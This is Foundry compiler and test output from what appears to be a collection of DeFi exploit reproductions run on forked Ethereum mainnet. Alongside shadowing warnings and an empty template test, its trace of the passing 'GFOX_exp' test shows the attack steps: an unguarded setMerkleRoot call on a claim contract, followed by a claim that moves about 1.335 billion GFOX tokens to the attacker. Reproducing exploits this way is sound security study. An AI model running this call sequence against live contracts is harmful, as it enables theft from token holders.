Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.55s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.39s (3.94ms CPU time)

Ran 1 test for src/test/2024-05/GFOX_exp.sol:GFOXExploit
[PASS] testExploit() (gas: 131069)
Logs:
  Attacker GFOX Balance Before exploit: 0.000000000000000000
  amountToClaim 1335339824388750000000000000
  Attacker GFOX Balance After exploit: 1335339824.388750000000000000

Traces:
  [49955] GFOXExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19835924 [1.983e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [131069] GFOXExploit::testExploit()
    ├─ [2642] 0x8F1CecE048Cade6b8a05dFA2f90EE4025F4F2662::balanceOf(GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker GFOX Balance Before exploit", val: 0, decimals: 18)
    ├─ [5235] 0x11A4a5733237082a6C08772927CE0a2B5f8A86B6::setMerkleRoot(0xdebcdb067f116280f7c907683086a2169640f761809db10df391b6be99e64fd1)
    │   ├─  storage changes:
    │   │   @ 3: 0xa1f89bcc4981b41883f84abcef1e8b44bc9d000f59abc86870892fda105d0aba → 0xdebcdb067f116280f7c907683086a2169640f761809db10df391b6be99e64fd1
    │   └─ ← [Stop]
    ├─ [103396] 0x11A4a5733237082a6C08772927CE0a2B5f8A86B6::claim(GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1780453099185000000000000000 [1.78e27], [])
    │   ├─ [0] console::log("amountToClaim", 1335339824388750000000000000 [1.335e27]) [staticcall]
    │   │   └─ ← [Stop]
    │   ├─ emit Claimed(param0: GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1335339824388750000000000000 [1.335e27], param2: 1780453099185000000000000000 [1.78e27])
    │   ├─ [69929] 0x8F1CecE048Cade6b8a05dFA2f90EE4025F4F2662::transfer(GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1335339824388750000000000000 [1.335e27])
    │   │   ├─ emit Transfer(from: 0x11A4a5733237082a6C08772927CE0a2B5f8A86B6, to: GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1335339824388750000000000000 [1.335e27])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe9514904613aadeeb603081fd9d0dee6e9f7104f05c76895beb877311a226de4: 0 → 0x000000000000000000000000000000000000000004509134ee30f88be72ee000
    │   │   │   @ 0x1f3d9d7b16d5eb50aa1a8a4c104f5e7c549d3c10c69bf87c3ea042283194bec0: 0x000000000000000000000000000000000000000005c0c19be8414b65343e8000 → 0x000000000000000000000000000000000000000001703066fa1052d94d0fa000
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000004509134ee30f88be72ee000
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x000000000000000000000000000000000000000004509134ee30f88be72ee000
    │   └─ ← [Stop]
    ├─ [642] 0x8F1CecE048Cade6b8a05dFA2f90EE4025F4F2662::balanceOf(GFOXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1335339824388750000000000000 [1.335e27]
    ├─ emit log_named_decimal_uint(key: "Attacker GFOX Balance After exploit", val: 1335339824388750000000000000 [1.335e27], decimals: 18)
    ├─  storage changes:
    │   @ 3: 0xa1f89bcc4981b41883f84abcef1e8b44bc9d000f59abc86870892fda105d0aba → 0xdebcdb067f116280f7c907683086a2169640f761809db10df391b6be99e64fd1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.75s (3.73s CPU time)

Ran 2 test suites in 9.16s (11.14s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
